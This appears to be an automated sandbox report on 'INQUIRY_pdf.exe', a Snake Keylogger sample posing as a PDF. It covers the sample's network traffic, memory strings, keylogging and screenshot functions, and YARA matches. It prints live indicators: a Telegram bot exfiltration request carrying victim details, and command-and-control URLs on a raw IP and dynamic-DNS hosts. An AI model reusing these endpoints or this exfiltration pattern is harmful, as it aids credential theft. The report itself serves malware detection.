Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:364339%0D%0ADate%20and%20Time:%2019/11/2024%20/%2010:54:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20364339%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 18 Nov 2024 17:41:17 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: INQUIRY_pdf.exe, 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: INQUIRY_pdf.exe, 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: INQUIRY_pdf.exe, 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: INQUIRY_pdf.exe, 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: INQUIRY_pdf.exe, 00000004.00000002.4167533124.0000000006230000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.co
Source: INQUIRY_pdf.exe, 00000000.00000002.1703272703.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002A31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: INQUIRY_pdf.exe, 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: INQUIRY_pdf.exe, 00000000.00000002.1708291458.0000000007132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: INQUIRY_pdf.exe, 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:364339%0D%0ADate%20a
Source: INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002C26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlBfq
Source: INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002AF2000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: INQUIRY_pdf.exe, 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002A82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187
Source: INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002AAC000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002AF2000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.187$
Source: INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003B12000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003B5F000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003B87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003B62000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003DB4000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003CBC000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003AED000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003B12000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002B3C000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003B5F000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003CB6000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003B87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003B62000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003DB4000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003CBC000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003AED000.00000004.00000800.00020000.00000000.sdmp, INQUIRY_pdf.exe, 00000004.00000002.4164768415.0000000003B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: INQUIRY_pdf.exe	String found in binary or memory: https://www.google.com/#q=
Source: INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002C26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: INQUIRY_pdf.exe, 00000004.00000002.4162027017.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lBfq

Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49758 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot
Source: 0.2.INQUIRY_pdf.exe.3d9c940.0.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode
Source: 0.2.INQUIRY_pdf.exe.3d9c940.0.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.INQUIRY_pdf.exe.3ddf960.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.INQUIRY_pdf.exe.3ddf960.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.INQUIRY_pdf.exe.3ddf960.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.INQUIRY_pdf.exe.3d9c940.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.INQUIRY_pdf.exe.3d9c940.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.INQUIRY_pdf.exe.3d9c940.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.INQUIRY_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.INQUIRY_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.INQUIRY_pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.INQUIRY_pdf.exe.3ddf960.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.INQUIRY_pdf.exe.3d9c940.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.INQUIRY_pdf.exe.3d9c940.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: INQUIRY_pdf.exe PID: 7448, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: INQUIRY_pdf.exe PID: 7648, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: INQUIRY_pdf.exe

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 0_2_078AA728	0_2_078AA728
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 0_2_078A16E7	0_2_078A16E7
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 0_2_078A16F8	0_2_078A16F8
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 0_2_078AC2A0	0_2_078AC2A0
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 0_2_078AA2EA	0_2_078AA2EA
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 0_2_078AA2F0	0_2_078AA2F0
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 0_2_078A3032	0_2_078A3032
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 0_2_078A8F41	0_2_078A8F41
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 0_2_078A9EA1	0_2_078A9EA1
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 0_2_078A9EB8	0_2_078A9EB8
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 0_2_078AB9C8	0_2_078AB9C8
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 0_2_0AEC0040	0_2_0AEC0040
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 4_2_0108C146	4_2_0108C146
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 4_2_01085362	4_2_01085362
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 4_2_0108D278	4_2_0108D278
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 4_2_0108C468	4_2_0108C468
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 4_2_0108C738	4_2_0108C738
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 4_2_0108E988	4_2_0108E988
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 4_2_010869A0	4_2_010869A0
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 4_2_0108CA08	4_2_0108CA08
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 4_2_01089DE0	4_2_01089DE0
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 4_2_0108CCD8	4_2_0108CCD8
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 4_2_0108CFAA	4_2_0108CFAA
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 4_2_01086FC8	4_2_01086FC8
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 4_2_0108F644	4_2_0108F644
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 4_2_0108E97A	4_2_0108E97A
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 4_2_010829EC	4_2_010829EC
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 4_2_010839F0	4_2_010839F0
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 4_2_0108FA9C	4_2_0108FA9C
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 4_2_01083AA1	4_2_01083AA1
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Code function: 4_2_01083E09	4_2_01083E09

Source: INQUIRY_pdf.exe, 00000000.00000002.1703272703.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs INQUIRY_pdf.exe
Source: INQUIRY_pdf.exe, 00000000.00000002.1701291249.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs INQUIRY_pdf.exe
Source: INQUIRY_pdf.exe, 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs INQUIRY_pdf.exe
Source: INQUIRY_pdf.exe, 00000000.00000002.1704541786.0000000003B61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs INQUIRY_pdf.exe
Source: INQUIRY_pdf.exe, 00000000.00000002.1707743033.0000000005F90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs INQUIRY_pdf.exe
Source: INQUIRY_pdf.exe, 00000000.00000002.1711124975.0000000007D00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs INQUIRY_pdf.exe
Source: INQUIRY_pdf.exe, 00000000.00000002.1703272703.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs INQUIRY_pdf.exe
Source: INQUIRY_pdf.exe, 00000004.00000002.4160198053.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs INQUIRY_pdf.exe
Source: INQUIRY_pdf.exe, 00000004.00000002.4160420469.0000000000AF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs INQUIRY_pdf.exe
Source: INQUIRY_pdf.exe	Binary or memory string: OriginalFilenameiuqE.exe8 vs INQUIRY_pdf.exe

Source: INQUIRY_pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.INQUIRY_pdf.exe.3ddf960.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.INQUIRY_pdf.exe.3ddf960.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.INQUIRY_pdf.exe.3ddf960.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.INQUIRY_pdf.exe.3d9c940.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
